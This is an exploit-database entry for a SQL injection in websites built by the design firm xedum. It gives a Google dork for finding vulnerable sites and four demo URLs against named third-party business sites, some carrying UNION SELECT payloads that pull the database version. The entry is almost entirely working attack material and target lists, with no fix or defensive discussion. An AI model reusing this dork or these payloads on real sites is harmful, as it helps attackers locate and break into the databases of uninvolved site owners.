xedum SQL injection

2013.07.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ Exploit Title: xedum SQL injection $$ $$ Google Dork: intext:"design by xedum" inurl:"php?id" $$ $$ Date: 2013/07/24 $$ $$ Exploit Author: Wild Wolves Team $$ $$ Vendor Homepage: http://www.xedum.com $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ Demo1: http://www.paroXditore.it/itinerari.php?id=15%27 $$ $$ Demo2: http://www.caXiaso-ortofrutta.it/patate_curiosita.php?id=7%27 $$ $$ Demo3: http://www.viXserra.it/event.php?id=-19++union+select+1,2,3,4,5,6,version%28%29,8,9,10,11,12-- $$ $$ Demo4: http://www.liXtrading.com/eng/edilizia_prod_details.php?id=-58+union+select+1,version%28%29,3,4-- $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ Special Greetz : R3veC0der $$ $$ Designed By Wild Wolf $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

References:

http://www.xedum.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top